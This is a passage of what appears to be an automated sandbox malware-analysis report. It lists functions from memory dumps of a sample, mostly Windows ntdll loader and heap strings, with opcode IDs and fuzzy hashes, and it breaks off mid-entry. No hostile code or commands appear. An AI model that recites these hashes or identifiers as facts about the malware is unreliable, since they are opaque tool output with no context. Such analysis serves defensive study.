                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011B22B6
                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011B21D9, 011B22B1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                    • API String ID: 0-1239276146
                                                    • Opcode ID: 1228fda842fd1646480b35f92ff4b469a638b845ffd54236f1b72c787c7acf41
                                                    • Instruction ID: daf5065e9f4b46fb99c2377e4d136b352bf7d44da9a9bc9135cf24b9ea346de2
                                                    • Opcode Fuzzy Hash: 1228fda842fd1646480b35f92ff4b469a638b845ffd54236f1b72c787c7acf41
                                                    • Instruction Fuzzy Hash: B1A1A131900229DBDB2DCF68C884BE9B7B1BF58354F1941E9D908A7351E730AE86CF91
                                                    Function 011464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 011A1028
                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 011A106B
                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 011A0FE5
                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011A10AE
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                    • API String ID: 0-1468400865
                                                    • Opcode ID: a396523a9e4b1102051993e47eb1bac0871c3f5f051dafd3a1efd73a676bae6f
                                                    • Instruction ID: af60f0beddf2ab8bf0f54582d4f65d9741a1447226de04cf5f50f44b571e1be6
                                                    • Opcode Fuzzy Hash: a396523a9e4b1102051993e47eb1bac0871c3f5f051dafd3a1efd73a676bae6f
                                                    • Instruction Fuzzy Hash: 6871F2B1904345AFCB25EF14C884B977FA9AF95BA8F400468F9488B146D334D589CFD2
                                                    Function 0116245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 011AA992
                                                    • apphelp.dll, xrefs: 01162462
                                                    • LdrpDynamicShimModule, xrefs: 011AA998
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 011AA9A2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-176724104
                                                    • Opcode ID: 0d60422ef3c5f6ec6afb91d45022a43e96d8beacbe08fc3ec02141c9a9959912
                                                    • Instruction ID: 90179b60e5f43f77ff011686619fb6e94bfa24dc02cf1535bf96dc5bca196c32
                                                    • Opcode Fuzzy Hash: 0d60422ef3c5f6ec6afb91d45022a43e96d8beacbe08fc3ec02141c9a9959912
                                                    • Instruction Fuzzy Hash: 67314A75A00302EBDB3DDF5DF849AAA7BB8FF84B04F560019E9016B245D7B09A51C780
                                                    Function 011529A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • HEAP[%wZ]: , xrefs: 01153255
                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0115327D
                                                    • HEAP: , xrefs: 01153264
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                    • API String ID: 0-617086771
                                                    • Opcode ID: ef0f8e6786c4fcae9a3c61e1415f5cc4033c22e5e7ec18bb7276eff0a7f6843e
                                                    • Instruction ID: 30b106aeb0594844bc1be1afcf5382d15366eb4470cb0e781840db42d4839b26
                                                    • Opcode Fuzzy Hash: ef0f8e6786c4fcae9a3c61e1415f5cc4033c22e5e7ec18bb7276eff0a7f6843e
                                                    • Instruction Fuzzy Hash: 0D92CD71A04649DFDB69CF68C444BAEBBF1FF48304F188099E869AB392D735A941CF50
                                                    Function 01150770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-4253913091
                                                    • Opcode ID: 908931b0760e9dba248d2600aa7d20a7afaa230a48b3c658910a0c9cb2830385
                                                    • Instruction ID: db1c5803d1f09615b81dcc20321786901511def1105587d2025faa09cfe240f9
                                                    • Opcode Fuzzy Hash: 908931b0760e9dba248d2600aa7d20a7afaa230a48b3c658910a0c9cb2830385
                                                    • Instruction Fuzzy Hash: CFF1CF34A04606DFDB5DCFA8C894F6ABBB2FF48304F154169E8269B385D730E981CB51
                                                    Function 00417DCA Relevance: 4.1, Strings: 3, Instructions: 317COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: =$www.$www.
                                                    • API String ID: 0-3343787489
                                                    • Opcode ID: 5b611f8e9ee1ff1bdd803b53837493fe3bf719a643394e8cde68045fe36adc92
                                                    • Instruction ID: 4b1b4fca41e8a1c2719216c0780adceb2e1f60683be9f149266314501c592d8c
                                                    • Opcode Fuzzy Hash: 5b611f8e9ee1ff1bdd803b53837493fe3bf719a643394e8cde68045fe36adc92
                                                    • Instruction Fuzzy Hash: 40C1B7B5944208AAD715DBF0CCC2FDBB77CAF04308F00455EF6595B182DB78A688CBA9
                                                    Function 01166962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: $@
                                                    • API String ID: 2994545307-1077428164
                                                    • Opcode ID: bf4ac688bff722c6a30086bc082393dd0ea3ac0ddf975a54b39c28257abbf2d7
                                                    • Instruction ID: 25b0c107251edd5e85a15c9d4409c9d08786f6f2b264978d128ae399fe147692
                                                    • Opcode Fuzzy Hash: bf4ac688bff722c6a30086bc082393dd0ea3ac0ddf975a54b39c28257abbf2d7
                                                    • Instruction Fuzzy Hash: 72C290716083419FE72DCF28C840BABBBE9BF88758F05892DE989C7241D735D855CB92
                                                    Function 0113A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                    • API String ID: 0-2779062949
                                                    • Opcode ID: b4040c4afc4d39d86dc56980d40282212a6db0548d3ed2f46cda3e4722747f5a
                                                    • Instruction ID: d77fd4eb2d43b743ef2a8ce176eb722d71ac0023582c689684abf198f92a7ad9
                                                    • Opcode Fuzzy Hash: b4040c4afc4d39d86dc56980d40282212a6db0548d3ed2f46cda3e4722747f5a
                                                    • Instruction Fuzzy Hash: EAA15B719112299BDF39DF28CC88BEAB7B8EF48704F1041E9E958A7250D7359E84CF90
                                                    Function 01160BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 011AA121
                                                    • LdrpCheckModule, xrefs: 011AA117
                                                    • Failed to allocated memory for shimmed module list, xrefs: 011AA10F
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-161242083
                                                    • Opcode ID: 900fc82bbc5168ec6e77f09f56ead6c487a643bc8cbad5c224907f9756f96fe4
                                                    • Instruction ID: f76b9eec6cfdab87bb681e555d9102d476372708040891c6b5e54b458ab83c50
                                                    • Opcode Fuzzy Hash: 900fc82bbc5168ec6e77f09f56ead6c487a643bc8cbad5c224907f9756f96fe4
                                                    • Instruction Fuzzy Hash: 5571F074A00205EFDB2DDF68D984ABEBBF8FF48204F04446DE8029B245E735AE51CB41
                                                    Function 01150A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-1334570610
                                                    • Opcode ID: 53997cab687ddf5c393208f9639b04672ed1f254354be8e57b268f2e8d3d9668
                                                    • Instruction ID: 9abeb2f69266cfedd0ff905cfeaf06d1a2ddb08d38932febca4b63b87dcfe92e
                                                    • Opcode Fuzzy Hash: 53997cab687ddf5c393208f9639b04672ed1f254354be8e57b268f2e8d3d9668
                                                    • Instruction Fuzzy Hash: 6F61BE74604301DFDB6DCF68C480B6ABBE2FF89704F158559F8698B296D770E881CB91
                                                    Function 0117C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Failed to reallocate the system dirs string !, xrefs: 011B82D7
                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 011B82DE
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 011B82E8
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1783798831
                                                    • Opcode ID: 593150fc7f405544b91458ca174ba93b21c003da5bb5d12c9b1b169fcff582ad
                                                    • Instruction ID: 6c86270ae5ee9d3f86b4c527d954710f4a0e77c5d4d58d8ad292368f539f0ffd
                                                    • Opcode Fuzzy Hash: 593150fc7f405544b91458ca174ba93b21c003da5bb5d12c9b1b169fcff582ad
                                                    • Instruction Fuzzy Hash: 7F411372554702EBD729EB68E845B9BBBECEF45B54F00492AF948D3250EB74D800CBD2
                                                    Function 011FC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • @, xrefs: 011FC1F1
                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 011FC1C5
                                                    • PreferredUILanguages, xrefs: 011FC212
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                    • API String ID: 0-2968386058
                                                    • Opcode ID: a6088dd2c3526a442ba918b85a2857662745cad1ba0ee32ca02a6215c0b5774e
                                                    • Instruction ID: 1b5f7670c602cd51c03118da4efbf69a393beeecf37a323bf6611c07a0b27842
                                                    • Opcode Fuzzy Hash: a6088dd2c3526a442ba918b85a2857662745cad1ba0ee32ca02a6215c0b5774e
                                                    • Instruction Fuzzy Hash: CC418275E0020DEBDF19DAD8C841FEEBBB9EB14704F04406EEA19B7240D7749A44DB90
                                                    Function 011D4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                    • API String ID: 0-1373925480
                                                    • Opcode ID: edd9b2bdf60c6fa9620c13f93b5df97407fb7cb71f1f68389b8438cafdc80bef
                                                    • Instruction ID: 39642bdc511ba74952db17cdd63eb146c0cb36bf1c94abc2f11b4139368fc543
                                                    • Opcode Fuzzy Hash: edd9b2bdf60c6fa9620c13f93b5df97407fb7cb71f1f68389b8438cafdc80bef
                                                    • Instruction Fuzzy Hash: F2414232A00259CBEB2EDBE8D840BADBBB8FF65384F15045AD911EBF81D7349901CB11
                                                    Function 011C4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011C4888
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 011C4899
                                                    • LdrpCheckRedirection, xrefs: 011C488F
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-3154609507
                                                    • Opcode ID: a503f4feeda4f663a59543d00111d4efe1a94e14d81e111d57516d5d3b805de1
                                                    • Instruction ID: a7e9643994b699b211b00d367b4f4a4e838b3e0acebd5f5047f3816bccf18cd0
                                                    • Opcode Fuzzy Hash: a503f4feeda4f663a59543d00111d4efe1a94e14d81e111d57516d5d3b805de1
                                                    • Instruction Fuzzy Hash: 5C41D432A187519FCB29CF9CD860A27BBE4EF69E50B06056DED88D7B55D730D800CB92
                                                    Function 01150BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-2558761708
                                                    • Opcode ID: 33eae89813c088181a0b67398d8f2f5b16e87a51e958bca7a19ed723732f2f54
                                                    • Instruction ID: e360334c51eedad71632eccae24a0154cdb627cd8a4b96f352c62915159d3817
                                                    • Opcode Fuzzy Hash: 33eae89813c088181a0b67398d8f2f5b16e87a51e958bca7a19ed723732f2f54
                                                    • Instruction Fuzzy Hash: 58113335318102DFDBADCA18C485B7ABBA6EF84719F1A812DF816CB256FB30D840C756
                                                    Function 011C20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Process initialization failed with status 0x%08lx, xrefs: 011C20F3
                                                    • LdrpInitializationFailure, xrefs: 011C20FA
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 011C2104
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2986994758
                                                    • Opcode ID: ff72e556b7e4c78cb8ca18d3d50fc154fb496650df6b9e8e841b030b346a6343
                                                    • Instruction ID: 3c75daf45dacef739d0c8241d7179115152aea7824a12b9b78a82ef9f3d4236f
                                                    • Opcode Fuzzy Hash: ff72e556b7e4c78cb8ca18d3d50fc154fb496650df6b9e8e841b030b346a6343
                                                    • Instruction Fuzzy Hash: C5F0C235640319BBE72CEA4DEC46F993BA8EB91F58F50006DF60077685E7F0AA10CA91
                                                    Function 011503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: #%u
                                                    • API String ID: 48624451-232158463
                                                    • Opcode ID: dd110ca5632f1ead36b0c15754322c3712efa593b949a7a077168a00e0ca77a3
                                                    • Instruction ID: b65694c337e1020fb1abddb8a4a86f7de66f72dafbc82d03a73564ba8b1410b5
                                                    • Opcode Fuzzy Hash: dd110ca5632f1ead36b0c15754322c3712efa593b949a7a077168a00e0ca77a3
                                                    • Instruction Fuzzy Hash: F2716871A0014ADFDB09DFA8C980BAEBBF8FF18744F154065E915A7251EB74EE01CBA1
                                                    Function 0114A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrResSearchResource Exit, xrefs: 0114AA25
                                                    • LdrResSearchResource Enter, xrefs: 0114AA13
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                    • API String ID: 0-4066393604
                                                    • Opcode ID: 52a483b6dbf4677b258f90266ae50b5a80caa94ff6aa28301d438d8542e50d68
                                                    • Instruction ID: a2b7e1f9c075e317a956f4714a7b8a6890b0f95e9e808bb7d2be95d327b7eedc
                                                    • Opcode Fuzzy Hash: 52a483b6dbf4677b258f90266ae50b5a80caa94ff6aa28301d438d8542e50d68
                                                    • Instruction Fuzzy Hash: AEE19275E802199FEB2ECF98D980BAEBBB9FF44714F12442AE912E7241D734D940CB51
                                                    Function 0120A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$`
                                                    • API String ID: 0-197956300
                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction ID: 8153e0d8ccbb18374daa44082ce70e6e703f8587164450e409832b8e842f8dc4
                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction Fuzzy Hash: 2CC1AF312243429BEB26CF28C841B6BBBE5AFD4318F444B2CF6968B2D2D775D545CB41
                                                    Function 011BE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    • Opcode ID: 32b0c917efee5da31790b53579fea0beeba784a2fef77fef94492161c9fb4533
                                                    • Instruction ID: a04e6c79fa9642a78be1bc00ef6fb41e208c568cb2ae0db8015a8524967dbc60
                                                    • Opcode Fuzzy Hash: 32b0c917efee5da31790b53579fea0beeba784a2fef77fef94492161c9fb4533
                                                    • Instruction Fuzzy Hash: AE616C72E017199FDB19DFA8C880BEEBBB5FB48704F14816DE659EB251E731A900CB50
                                                    Function 011E43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$MUI
                                                    • API String ID: 0-17815947
                                                    • Opcode ID: 4ba98015af89d61aad653276c0d161c7512938f19e41cf243825fc53fbcf1c5d
                                                    • Instruction ID: 886b341f51b85c4e9acc004d3401a172fcb57185c4733281f7f1c856b5b66442
                                                    • Opcode Fuzzy Hash: 4ba98015af89d61aad653276c0d161c7512938f19e41cf243825fc53fbcf1c5d
                                                    • Instruction Fuzzy Hash: 64511771E0061EAFDB15DFE9CC84AEEBBF8AF44758F104529E611E7690D7309A05CB60
                                                    Function 011404E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0114063D
                                                    • kLsE, xrefs: 01140540
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                    • API String ID: 0-2547482624
                                                    • Opcode ID: 73bb5f86501a63f905f435618f0d035bf17db0b70ecc4c64cdfaf8c6a9590bb3
                                                    • Instruction ID: 96a328b92cc69fc84b28c29e61d0262897ae6f7f43575d1bc2a6d5b55f0bb63a
                                                    • Opcode Fuzzy Hash: 73bb5f86501a63f905f435618f0d035bf17db0b70ecc4c64cdfaf8c6a9590bb3
                                                    • Instruction Fuzzy Hash: 6951BF715047429BD728DF6AC4406E7B7E8AF88B04F10483EE6EA87241E770D545CF92
                                                    Function 0114A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0114A2FB
                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0114A309
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                    • API String ID: 0-2876891731
                                                    • Opcode ID: 31ab6bc1619fd32a9708ca3f62491ebe0007f3dd9a587389f2fb2d8b7b1a48ef
                                                    • Instruction ID: fe1f20fbdea1b6b75f49521ae85809c642b38f98055dce5152bf45d7fb8127ba
                                                    • Opcode Fuzzy Hash: 31ab6bc1619fd32a9708ca3f62491ebe0007f3dd9a587389f2fb2d8b7b1a48ef
                                                    • Instruction Fuzzy Hash: D5411235A48245CFDB2DCF69D840B6EBBB4FF85B04F1640A9E912DB291E3B5D900CB41
                                                    Function 0117A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Cleanup Group$Threadpool!
                                                    • API String ID: 2994545307-4008356553
                                                    • Opcode ID: 06b1be0bb0705e0c412a94297834d45192c33a870b9cb0c9e25cbc511db318fe
                                                    • Instruction ID: 34f019aa1f939aa9d47f53e321486063081712640a95c1538678e8555e6287df
                                                    • Opcode Fuzzy Hash: 06b1be0bb0705e0c412a94297834d45192c33a870b9cb0c9e25cbc511db318fe
                                                    • Instruction Fuzzy Hash: 3901F4B2240704AFD316DF14DD49F1A77F9EB85719F058939B648C7694E334D904CB46
                                                    Function 0114C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: MUI
                                                    • API String ID: 0-1339004836
                                                    • Opcode ID: 7e1f8dd0c430b2908d8cacb34e224b3ca9d230c054b4ac3446c59bce843adb97
                                                    • Instruction ID: 5436cd21b720be1c8405fe21bc9845280ed6e4ef9b34b16a819e4b48c5a0daf1
                                                    • Opcode Fuzzy Hash: 7e1f8dd0c430b2908d8cacb34e224b3ca9d230c054b4ac3446c59bce843adb97
                                                    • Instruction Fuzzy Hash: F1827B75E012198FEF29CFA9D880BEDBBB1BF48B50F14816AD919AB350D7309941CF91
                                                    Function 011C6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 05d234c9437050fe9f1255f37f5d14375053d059c14d1e3cf4ad38369b3589b6
                                                    • Instruction ID: f9978d007d2b5c0eb0f0b2e234a47672d9f88a8f5baa15d15374716e6f6bb13b
                                                    • Opcode Fuzzy Hash: 05d234c9437050fe9f1255f37f5d14375053d059c14d1e3cf4ad38369b3589b6
                                                    • Instruction Fuzzy Hash: C9918372900219AFEB29DF95CC85FAEBBB8EF24B54F104019F601AB291D775ED00CB60
                                                    Function 011EE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
